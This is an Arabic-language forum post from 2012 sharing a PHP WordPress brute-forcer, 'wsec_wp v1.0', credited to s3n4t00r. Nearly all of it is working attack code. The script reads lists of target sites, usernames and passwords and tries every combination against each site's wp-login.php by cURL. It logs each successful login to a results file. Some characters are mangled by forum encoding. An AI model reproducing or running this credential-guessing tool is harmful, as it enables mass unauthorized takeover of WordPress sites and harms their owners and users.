السلام عليكم ورحمة الله وبركاته
اداة لتخمين
الوردبريس تحتاج فقط الى مترجم php
تعطيها لستت مواقع ولستت يوزرات وايضا لستت الباسوردات
شرح الادة على اليوتيوب كود PHP:
<?php
/*
author..............: s3n4t00r
home................: sec-w.com & v99x.com
twitter.............: @al_swisre
tool name...........: wsec_wp v1.0
Demonstration ......: http://goo.gl/vots5
*/
if (!extension_loaded('curl')) die("cURL extension required\n");
error_reporting(0);
set_time_limit(0);
$wp_crack = new s3n4t00r_wp_cracker();
print_r("\n
.oPYo. .8 o .oPYo. .oPYo.
`8 d'8 8 8 .o8 8 .o8
.oPYo. .oP' odYo. d' 8 o8P 8 .P'8 8 .P'8 oPYo.
Yb.. `b. 8' `8 Pooooo 8 8.d' 8 8.d' 8 8 `'
'Yb. :8 8 8 8 8 8o' 8 8o' 8 8
`YooP' `YooP' 8 8 8 8 `YooP' `YooP' 8
:.....::.....:..::..::::..:::..::.....::.....:..::::
::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::
\n\n
# Programmer : s3n4t00r | @al_swisre
# Home : Sec-w.com & V99x.com
# Greets 4 : Exp-Bl00d - Saudi Eagle
\n***91;****93; list site (1/3) :");
$file_host = $wp_crack->stdin();
echo "\n\n***91;****93; list user (2/3) :";
$file_user = $wp_crack->stdin();
echo "\n\n***91;****93; list pass (2/3) :";
$file_pass = $wp_crack->stdin();
$crack = $wp_crack->cracker($file_host,$file_user,$file_pass);
if($crack){die('# END Brute Forcer - S3n4t00r');}
class s3n4t00r_wp_cracker{
public function cracker($file_host,$file_user,$file_pass){
$list_host = file_get_contents($file_host) or die ("\n WTF list host not found ?");
$list_user = file_get_contents($file_user) or die (" \n WTF list user not found ? \n");
$list_pass = file_get_contents($file_pass) or die (" \n WTF list pass not found ? \n");
$exp_host = explode("\n",$list_host);
$exp_user = explode("\n",$list_user);
$exp_pass = explode("\n",$list_pass);
$c_host = count($exp_host);
$c_user = count($exp_user);
$c_pass = count($exp_pass);
echo "
|=================================================+
| Host : $file_host - ($c_host)
|
| Username : $file_user - ($c_user)
|
| Password : $file_pass - ($c_pass)
|
| Start Brute Forcer > > >
|=================================================+
\n";
flush();
foreach ($exp_host as $host){
$host = str_replace('http://','',trim($host));
$get = get_headers("http://$host/wp-login.php");
if(!preg_match("/200 OK/",$get***91;0***93;)){continue; flush(); }
foreach($exp_user as $user) {
flush();
foreach($exp_pass as $pass){
flush();
$host = trim($host);
$user = trim($user);
$pass = trim($pass);
echo "***91;-***93; Testing -> $host:$user:$pass \n";
$login = $this->login($host,$user,$pass);
if($login){echo "\n ***91;+***93; Found : $host:$user:$pass \n\n";
$this->save($host,$user,$pass);
flush();
}else{continue;}
flush();
}
flush();
}
flush();
}
return true;
}
private function login($host,$user,$pass){
$curl = curl_init();
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS,"log=$user&pwd=$pass&rememberme=forever&wp-submit=Log In&test******=1");
curl_setopt($curl, CURLOPT_URL,"http://".$host."/wp-login.php");
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_VERBOSE,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)');
curl_setopt($curl, CURLOPT_******JAR,"******.txt");
curl_setopt($curl, CURLOPT_******FILE,"******.txt");
$ex = curl_exec($curl);
if($ex){
if(!preg_match('/ERROR/',$ex)){
curl_close($curl);
return true;
}
}
curl_close($curl);
return false;
}
private function save($host,$user,$pass){
$f = fopen('wp_result.txt','ab');
$w = fwrite($f,"***91;$host***93; - ***91;$user***93; - ***91;$pass) \n \n");
if($w){return true;}
}
public function stdin(){
$fp = fopen("php://stdin","r");
$line = trim(fgets($fp));
fclose($fp);
return $line;
}
//end class
}
?>
الحقوق لـ
عالم الحماية
h]hm joldk ugn hg,v]fvds - Wordpress Brute Forcer
09-26-2012, 12:48 AM
اداة تخمين على الوردبريس - Wordpress Brute Forcer 
العرض الشجري
